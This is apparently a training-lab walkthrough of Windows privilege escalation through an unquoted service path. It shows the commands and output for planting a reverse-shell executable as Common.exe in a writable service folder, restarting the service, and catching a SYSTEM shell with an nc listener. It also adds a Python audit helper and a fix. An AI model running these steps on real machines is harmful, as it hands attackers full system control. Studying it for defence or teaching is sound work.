How the vulnerability works
Query the "unquotedsvc" service to check whether it runs with SYSTEM privileges (SERVICE_START_NAME) and whether its BINARY_PATH_NAME is unquoted and contains spaces.
sc qc unquotedsvc
Output
C:\Users\user\Desktop>sc qc unquotedsvc
sc qc unquotedsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: unquotedsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Unquoted Path Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\user\Desktop>
sc qc shows the path of the binary the service loads, and SERVICE_START_NAME shows it runs as LocalSystem, i.e. with SYSTEM privileges.
Because BINARY_PATH_NAME is not enclosed in quotes, the service control manager tries the following paths in order (stopping at each space):
c:\program.exe
c:\program files.exe
c:\program files\Unquoted.exe
C:\Program Files\Unquoted Path.exe
C:\Program Files\Unquoted Path Service\Common.exe
C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
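As an added audit helper (not part of the original write-up), the following Python parses `sc qc` output, derives the candidate executables strictly by the rule of stopping at each space (so for this path it yields five, not the six listed above), and lists the directories whose ACLs must not grant write access to standard users; the `sc qc` text is a constructed sample modelled on the output above.

```python
import ntpath
import re

# Constructed sample of `sc qc` output, modelled on the write-up's service.
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        BINARY_PATH_NAME   : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
        DISPLAY_NAME       : Unquoted Path Service
        SERVICE_START_NAME : LocalSystem
"""

def parse_sc_qc(text):
    """Return the `KEY : value` fields printed by `sc qc` as a dict."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s?(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields

def search_candidates(binary_path):
    """Executables the service control manager tries, in order, for a path.

    A quoted path, or one without spaces, is unambiguous. An unquoted path
    with spaces is cut at each space, ".exe" is appended to that prefix, and
    the full path is tried last.
    """
    path = binary_path.strip()
    if path.startswith('"'):
        return [path[1:path.index('"', 1)]]
    parts = path.split(" ")
    if len(parts) == 1:
        return [path]
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))] + [path]

def audit_service(sc_qc_output):
    """Who the service runs as, which files are tried before the real binary,
    and which directories therefore need an ACL check (what accesschk checks)."""
    cfg = parse_sc_qc(sc_qc_output)
    candidates = search_candidates(cfg["BINARY_PATH_NAME"])
    dirs = list(dict.fromkeys(ntpath.dirname(c) for c in candidates[:-1]))
    return {
        "service": cfg.get("SERVICE_NAME"),
        "runs_as": cfg.get("SERVICE_START_NAME"),
        "unquoted_with_spaces": len(candidates) > 1,
        "tried_before_real": candidates[:-1],
        "dirs_to_check": dirs,
    }
```

The fix for a flagged service is to quote BINARY_PATH_NAME (for example with `sc config`) and to remove write access for BUILTIN\Users on every directory in `dirs_to_check`.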
Use accesschk.exe to check the permissions on that path; the current user turns out to have read and write access.
C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
Output
C:\Users\user\Desktop>C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
C:\Program Files\Unquoted Path Service
Medium Mandatory Level (Default) [No-Write-Up]
RW BUILTIN\Users
RW NT SERVICE\TrustedInstaller
RW NT AUTHORITY\SYSTEM
RW BUILTIN\Administrators
C:\Users\user\Desktop>
Then, before the service starts, place a file with one of those names in the path; when the service control manager finds it, it executes it, giving code execution with the service's privileges.
copy C:\Users\user\Desktop\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
Output
C:\Users\user\Desktop>copy C:\Users\user\Desktop\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
copy C:\Users\user\Desktop\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
1 file(s) copied.
C:\Users\user\Desktop>dir "C:\Program Files\Unquoted Path Service"
dir "C:\Program Files\Unquoted Path Service"
Volume in drive C has no label.
Volume Serial Number is 54A8-AA62
Directory of C:\Program Files\Unquoted Path Service
02/28/2023 07:44 AM <DIR> .
02/28/2023 07:44 AM <DIR> ..
06/05/2020 07:32 AM <DIR> Common Files
02/28/2023 07:42 AM 7,168 Common.exe
1 File(s) 7,168 bytes
3 Dir(s) 30,850,818,048 bytes free
C:\Users\user\Desktop>
Start a listener on the attacking machine and restart the service; the resulting shell inherits the service's privileges.
Restart the service
net start unquotedsvc
Output
C:\Users\user\Desktop>net start unquotedsvc
net start unquotedsvc
The service is not responding to the control function.
More help is available by typing NET HELPMSG 2186.
C:\Users\user\Desktop>
Listener on the attacking machine
root@ip-10-10-25-36:~/Desktop# nc -lvnp 6666
Listening on [0.0.0.0] (family 0, port 6666)
Connection from 10.10.52.162 49782 received!
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>